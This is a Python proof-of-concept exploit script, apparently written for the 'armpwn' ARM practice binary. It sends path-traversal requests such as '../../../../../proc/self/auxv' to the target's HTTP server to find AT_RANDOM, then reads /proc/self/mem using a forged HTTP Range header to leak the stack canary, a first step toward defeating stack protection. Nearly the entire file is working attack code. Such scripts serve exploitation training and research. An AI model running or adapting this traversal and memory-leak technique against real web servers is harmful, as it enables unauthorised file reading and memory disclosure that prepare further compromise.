#!/usr/bin/env python
#
# Leak the stack canary of the armpwn binary through the directory traversal in
# its HTTP server: read /proc/self/auxv to find AT_RANDOM, then read the canary
# seed at that address out of /proc/self/mem using an HTTP Range header.
#
# @_hugsy_
#
# armpwn was created/maintained by @5aelo
#
from __future__ import print_function

import socket
import struct
import sys
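HOST, PORT = "rpi2-1", 80
AT_RANDOM = 25     # auxv entry type: address of the 16 kernel-supplied random bytes
AT_NULL = 0        # auxv entry type: end of the vector
TIMEOUT = 5.0      # seconds; the server may keep the connection open, so recv() must not hang forever
HEADER_END = b"\r\n\r\n"
# armpwn is a 32-bit little-endian ARM target: an auxv entry is a (type, value)
# pair of 4-byte words and the canary is one 4-byte word.
AUXV_ENTRY = struct.Struct("<II")
WORD = struct.Struct("<I")


def build_request(path, extra_headers=()):
    """Return a raw HTTP/1.0 GET for *path* as bytes.

    *path* is sent verbatim: no URL-encoding and no normalisation. The server's
    lack of path normalisation is the directory traversal this PoC relies on, so
    ``../../../../../proc/self/auxv`` must reach it untouched.

    Args:
        path: request target, used as-is.
        extra_headers: iterable of complete header lines without CRLF.
    """
    lines = ["GET {} HTTP/1.0".format(path)]
    lines.extend(extra_headers)
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def recv_response(sock, done):
    """Read an HTTP response from *sock* and return its body as bytes.

    A single recv() is not guaranteed to deliver a whole response, so this
    keeps reading until the header terminator has been seen and ``done(body)``
    is true, the peer closes, or the socket timeout fires. Returns b"" if no
    header terminator was ever seen (e.g. garbage or an empty reply).
    """
    buf = bytearray()
    while True:
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
        sep = buf.find(HEADER_END)
        if sep != -1 and done(bytes(buf[sep + len(HEADER_END):])):
            break
    sep = buf.find(HEADER_END)
    if sep == -1:
        return b""
    return bytes(buf[sep + len(HEADER_END):])


def find_auxv(body, wanted):
    """Return the value of auxv entry type *wanted* in raw 32-bit *body*, or None.

    Stops at AT_NULL and ignores a trailing partial entry, so a truncated or
    padded read never feeds a short slice to struct.
    """
    for off in range(0, len(body) - AUXV_ENTRY.size + 1, AUXV_ENTRY.size):
        a_type, a_val = AUXV_ENTRY.unpack_from(body, off)
        if a_type == AT_NULL:
            return None
        if a_type == wanted:
            return a_val
    return None


def auxv_terminated(body):
    """True once *body* contains an AT_NULL entry, i.e. the vector is complete."""
    for off in range(0, len(body) - AUXV_ENTRY.size + 1, AUXV_ENTRY.size):
        if AUXV_ENTRY.unpack_from(body, off)[0] == AT_NULL:
            return True
    return False


def auxv_ready(body):
    """Stop condition for the auxv read: AT_RANDOM seen, or the vector ended."""
    return find_auxv(body, AT_RANDOM) is not None or auxv_terminated(body)


def canary_from_random(seed):
    """Derive the stack canary from the first word of the AT_RANDOM bytes.

    Returns None if fewer than 4 bytes were read. The low byte is masked off:
    glibc zeroes it when it installs the canary on little-endian targets, so
    the leaked word must be masked the same way to match the live value.
    """
    if len(seed) < WORD.size:
        return None
    return WORD.unpack_from(seed, 0)[0] & 0xffffff00


def main():
    """Leak the armpwn server's stack canary; return a process exit status."""
    sock = socket.create_connection((HOST, PORT), TIMEOUT)
    try:
        print("[+] Connected")
        print("[+] Leaking AUXV")
        # /proc/self is the process that answers this request. NOTE(review): the
        # leaked canary is only useful if the handler exploited later shares it
        # (same process, or a fork()ed child that inherited it) - confirm against
        # the server's request model.
        sock.sendall(build_request("../../../../../proc/self/auxv"))
        at_random = find_auxv(recv_response(sock, auxv_ready), AT_RANDOM)
        if at_random is None:
            print("[-] not found")
            return 1
        print("[+] AT_RANDOM={:#x}".format(at_random))
        print("[+] Forging HTTP request using Range")
        # Range lets us read /proc/self/mem at an arbitrary offset. The range is
        # inclusive, so this asks for 17 bytes; only the first word is needed.
        span = "Range: bytes={:d}-{:d}".format(at_random, at_random + 16)
        sock.sendall(build_request("../../../../../proc/self/mem", [span]))
        canary = canary_from_random(recv_response(sock, lambda b: len(b) >= WORD.size))
        if canary is None:
            print("[-] short read from /proc/self/mem")
            return 1
        print("[+] Canary is {:#x}".format(canary))
        return 0
    finally:
        sock.close()


if __name__ == "__main__":
    sys.exit(main())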